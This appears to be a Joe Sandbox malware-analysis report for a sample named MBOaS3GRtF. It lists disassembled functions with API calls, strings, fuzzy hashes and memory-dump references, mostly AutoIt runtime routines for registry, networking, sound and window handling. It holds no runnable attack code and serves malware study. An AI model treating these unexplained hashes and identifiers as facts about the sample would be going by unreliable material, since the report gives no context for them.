Opcode Fuzzy Hash: 1ddca1eddadddcc48a9a946315df73ce6cb79164a0aa859afe6aea7a853c4593
Instruction Fuzzy Hash: 4C41F772C1422DAACB21EFA4ED85DFEB7B8BF08750F404069F915A72A1DB705D05CB90

Function 00B20E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

Strings

HKEY_LOCAL_MACHINE, xrefs: 00B20E9A
HKEY_CURRENT_CONFIG, xrefs: 00B20EEE
HKCU, xrefs: 00B20F21
HKEY_CURRENT_USER, xrefs: 00B20F10
HKEY_CLASSES_ROOT, xrefs: 00B20EC4
HKCC, xrefs: 00B20EFF
HKU, xrefs: 00B20F43
HKCR, xrefs: 00B20ED9
HKLM, xrefs: 00B20EAF
HKEY_USERS, xrefs: 00B20F32

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: aff4d704120b952ba60b2d20771d380ff0121f5af4d18b101cb1b2f1001d5b98
Instruction ID: b6aa975ec87df07bbecb03b62dc5ad51c34ea99d807ec27093c29c4be9d2951d
Opcode Fuzzy Hash: aff4d704120b952ba60b2d20771d380ff0121f5af4d18b101cb1b2f1001d5b98
Instruction Fuzzy Hash: 1F412D3215425ACBDF20EF10EA95BEF37A4EF15340F5504A4FC691B292DB349D5ACB60

Function 00AFF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00ADE2A0,00000010,?,Bad directive syntax error,00B2F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AFF7C2
LoadStringW.USER32(00000000,?,00ADE2A0,00000010), ref: 00AFF7C9

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

_wprintf.LIBCMT ref: 00AFF7FC
__swprintf.LIBCMT ref: 00AFF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AFF88D

Strings

Line %d (File "%s"):, xrefs: 00AFF833
Line %d:, xrefs: 00AFF818
., xrefs: 00AFF873
%s (%d) : ==> %s.: %s %s, xrefs: 00AFF7F7
Error: , xrefs: 00AFF85B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 7692a7ec3a0e8b791349a24467f626118b2d0e23762319e012464b35e765be8a
Instruction ID: 4d250b2a7bfbb76e7e88421621370479f3c8ed93f71690cd275bd031dfd68e1f
Opcode Fuzzy Hash: 7692a7ec3a0e8b791349a24467f626118b2d0e23762319e012464b35e765be8a
Instruction Fuzzy Hash: 5A213C3290021EABCF12AFA0CD4AEFE7779BF18311F0444A9B515761A2EB719618DB51

Function 00B052C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Part of subcall function 00AA7924: _memmove.LIBCMT ref: 00AA79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B05330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B05346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B05357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B05369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0537A

Strings

alias PlayMe, xrefs: 00B05309
play PlayMe, xrefs: 00B05375
status PlayMe mode, xrefs: 00B0532B
play PlayMe wait, xrefs: 00B05364
close PlayMe, xrefs: 00B05341, 00B0536E
open , xrefs: 00B052DF

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c88f05d3d3ab578bcbb18d84915e899b84bb83a0313ed3cad9a526017d2a6396
Instruction ID: 1a01f25078774aff52f788a830fcba9f5c68048a9b156e7474b815ad5d858a8a
Opcode Fuzzy Hash: c88f05d3d3ab578bcbb18d84915e899b84bb83a0313ed3cad9a526017d2a6396
Instruction Fuzzy Hash: BD118231A5016D79D770B661CC4AEFFBFFCEB96B41F4004A9B802A70E1DEA01D09C9A0

Function 00B046B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B046D2
gethostname.WSOCK32(?,00000100), ref: 00B046EC
gethostbyname.WSOCK32(?), ref: 00B046F9
_wcscpy.LIBCMT ref: 00B04721
_memmove.LIBCMT ref: 00B04734
inet_ntoa.WSOCK32(?), ref: 00B0473F
_strcat.LIBCMT ref: 00B0474D
_wcscpy.LIBCMT ref: 00B04764
WSACleanup.WSOCK32 ref: 00B04772
_wcscpy.LIBCMT ref: 00B04780

Strings

0.0.0.0, xrefs: 00B0471B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 6005182e431a9773849aa4d274e41e67c7c57d40990febf40e6750531feb953a
Instruction ID: 52d04d96522e02ae3f2b8b6190017e4dd059e8cd28028ed69f286ffb9becaf38
Opcode Fuzzy Hash: 6005182e431a9773849aa4d274e41e67c7c57d40990febf40e6750531feb953a
Instruction Fuzzy Hash: 8211D271500115AFDB25AB70AD8AFEA7BFCEB02711F0441FAF545970A1EF708E828B50

Function 00B04F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B04F7A

Part of subcall function 00AC049F: timeGetTime.WINMM(?,7608B400,00AB0E7B), ref: 00AC04A3

Sleep.KERNEL32(0000000A), ref: 00B04FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00B04FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B04FEC
SetActiveWindow.USER32 ref: 00B0500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B05019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B05038
Sleep.KERNEL32(000000FA), ref: 00B05043
IsWindow.USER32 ref: 00B0504F
EndDialog.USER32(00000000), ref: 00B05060

Strings

BUTTON, xrefs: 00B04FDE

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: d543e6883ea6bebe9bb6c8913e7f2f2ef998939051fd9d8252520e44af604536
Instruction ID: 82a6e68a3b57627a907c7bca566b3dbebf90d5834747f4781c7ab75d7211ce14
Opcode Fuzzy Hash: d543e6883ea6bebe9bb6c8913e7f2f2ef998939051fd9d8252520e44af604536
Instruction Fuzzy Hash: 4F216F7020460AAFE7315F20ED99E3A7FA9EB65749F041078F506831F1DFA68D51CA61

Function 00B0D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

CoInitialize.OLE32(00000000), ref: 00B0D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B0D67D
SHGetDesktopFolder.SHELL32(?), ref: 00B0D691
CoCreateInstance.OLE32(00B32D7C,00000000,00000001,00B58C1C,?), ref: 00B0D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B0D74C
CoTaskMemFree.OLE32(?,?), ref: 00B0D7A4
_memset.LIBCMT ref: 00B0D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00B0D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B0D840
CoTaskMemFree.OLE32(00000000), ref: 00B0D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B0D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00B0D880

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: a54b221aca6f95fbb34d0e1008f09d063984c6e04fc252a85a3b379dfce8384e
Instruction ID: ae0cbcf9aa51d81876999b558c4945563cd9783f260f3a32fcd7c9dd93f71f56
Opcode Fuzzy Hash: a54b221aca6f95fbb34d0e1008f09d063984c6e04fc252a85a3b379dfce8384e
Instruction Fuzzy Hash: D6B1E975A00109AFDB14DFA4C984DAEBBF9EF49314F1484A9E909EB2A1DB31ED41CB50

Function 00AFC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00AFC283
GetWindowRect.USER32(00000000,?), ref: 00AFC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AFC2F3
GetDlgItem.USER32(?,00000002), ref: 00AFC2FE
GetWindowRect.USER32(00000000,?), ref: 00AFC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AFC364
GetDlgItem.USER32(?,000003E9), ref: 00AFC372
GetWindowRect.USER32(00000000,?), ref: 00AFC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AFC3C6
GetDlgItem.USER32(?,000003EA), ref: 00AFC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AFC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00AFC3FE

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
Instruction ID: b48bcc4a21110ecf70d949355888c68a1ebd1e0b0b5fa11f640721e816b0f069
Opcode Fuzzy Hash: ad23c421565daadf9083f650000f9b47c583c5bcb18089496faf92c270356760
Instruction Fuzzy Hash: A2510F71B00209ABDB18CFA9DD99ABEBBB6EB88711F14813DF615D7290DB709D41CB10

Function 00AA201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2036,?,00000000,?,?,?,?,00AA16CB,00000000,?), ref: 00AA1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AA20D3
KillTimer.USER32(-00000001,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00AA216E
DestroyAcceleratorTable.USER32(00000000), ref: 00ADBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA16CB,00000000,?,?,00AA1AE2,?,?), ref: 00ADBD0A
DeleteObject.GDI32(00000000), ref: 00ADBD1C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ab7e527e0fad0b1caee579d92ebef905635d19e5f13f2e15aeb24404c15f3a0b
Instruction ID: d14c426ad352d3991da6118fb3e4c85ef3e8d87da220dae8dae18016a00255a9
Opcode Fuzzy Hash: ab7e527e0fad0b1caee579d92ebef905635d19e5f13f2e15aeb24404c15f3a0b
Instruction Fuzzy Hash: 9C617C31511A01DFCB359F18D948B3AB7F2FB45312F104529E5828BAB0CBB5ACA1DBA1

Function 00AA21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

GetSysColor.USER32(0000000F), ref: 00AA21D3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 27359eee37ab4337618f4ef2cba80a2ef953a3fefaa442ae54cb6020a61e908c
Instruction ID: bfc0574b739a0ce7ef6c04487aaeb5748bf8013d2816dcde2ad37bd71ed4cbbc
Opcode Fuzzy Hash: 27359eee37ab4337618f4ef2cba80a2ef953a3fefaa442ae54cb6020a61e908c
Instruction Fuzzy Hash: 35417F31100141DADB255F2CDC88BF93B66EB47321F144266FE659B2E5CB318C66DB21

Function 00B0A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00B2F910), ref: 00B0A90B
GetDriveTypeW.KERNEL32(00000061,00B589A0,00000061), ref: 00B0A9D5
_wcscpy.LIBCMT ref: 00B0A9FF

Strings

removable, xrefs: 00B0A93D
ramdisk, xrefs: 00B0A97F
all, xrefs: 00B0A911
unknown, xrefs: 00B0A996
cdrom, xrefs: 00B0A927
fixed, xrefs: 00B0A953
network, xrefs: 00B0A969

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 00c30ac879761a64fb3a7d4feabf0f5d69c20f1efe0395aecffce650cc6ed5ca
Instruction ID: ea676a5cdc0232ca144dfb11ddfa728f598060d20c71b0a389afa768bf2556a8
Opcode Fuzzy Hash: 00c30ac879761a64fb3a7d4feabf0f5d69c20f1efe0395aecffce650cc6ed5ca
Instruction Fuzzy Hash: 3B518C312183019BC310EF14CA92EAFBBE5EF85740F514CADF896572E2DB319909CA53

Function 00AA9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00AA9862
__swprintf.LIBCMT ref: 00AA98AC
__i64tow.LIBCMT ref: 00ADF5E6

Strings

%.15g, xrefs: 00AA98A6
False, xrefs: 00ADF5AE
True, xrefs: 00ADF5A7
0x%p, xrefs: 00ADF5C8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 25c0b88d03e37904b814a13c991248111f4d751591de16888a628face449eaae
Instruction ID: 8505805378bbb9017ad4e11998941e7f1f6dca44d5850b454e2892e3efbd0120
Opcode Fuzzy Hash: 25c0b88d03e37904b814a13c991248111f4d751591de16888a628face449eaae
Instruction Fuzzy Hash: 8F41A171500205AEEB259F74E942F7BB3F8EF4A300F2044AEE54BDB291EB3599418B10

Function 00B27152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2716A
CreateMenu.USER32 ref: 00B27185
SetMenu.USER32(?,00000000), ref: 00B27194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27221
IsMenu.USER32(?), ref: 00B27237
CreatePopupMenu.USER32 ref: 00B27241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B2726E
DrawMenuBar.USER32 ref: 00B27276

Strings

F, xrefs: 00B27262
0, xrefs: 00B27160

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 5577a1faae530789d9dc1bbdb95b881ed88258f05bd9c9b8b22acb83f02518c7
Instruction ID: 2549156dfd014025b7654f907e3cd28c44ceeabdb0d4f3d9d4832d3b50b8f372
Opcode Fuzzy Hash: 5577a1faae530789d9dc1bbdb95b881ed88258f05bd9c9b8b22acb83f02518c7
Instruction Fuzzy Hash: CF416B74A01215EFDB20DF64E984EAA7BF5FF49310F1404A8F949A7360DB31A920CFA4

Function 00B274BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B2755E
CreateCompatibleDC.GDI32(00000000), ref: 00B27565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B27578
SelectObject.GDI32(00000000,00000000), ref: 00B27580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B2758B
DeleteDC.GDI32(00000000), ref: 00B27594
GetWindowLongW.USER32(?,000000EC), ref: 00B2759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B275B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B275BE

Strings

static, xrefs: 00B274F6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 87593af19407574fbe1c7d21275e6be0ba2be6c34e7cfe15d93cea740d9732f6
Instruction ID: fda1232a0d2b078c7c13acbc4e44be2c7a42693bf7bb18c9f893d2712cc3fef1
Opcode Fuzzy Hash: 87593af19407574fbe1c7d21275e6be0ba2be6c34e7cfe15d93cea740d9732f6
Instruction Fuzzy Hash: AB318431144125BBDF225F64EC09FEB7BB9FF19721F110268FA19961A0CB35D812DB64

Function 00AC6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC6E3E

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

__gmtime64_s.LIBCMT ref: 00AC6ED7
__gmtime64_s.LIBCMT ref: 00AC6F0D
__gmtime64_s.LIBCMT ref: 00AC6F2A
__allrem.LIBCMT ref: 00AC6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC6F9C
__allrem.LIBCMT ref: 00AC6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC6FD1
__allrem.LIBCMT ref: 00AC6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC7006
__invoke_watson.LIBCMT ref: 00AC7077

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: a7eb6716da1e1654193514a3270c4b37a093387c0e1d169bcfeced1e7712d5e5
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: D371E476A00717ABDB14EF69DD41F6AB7B8AF04360F15822EF515D7281EB70DE408B90

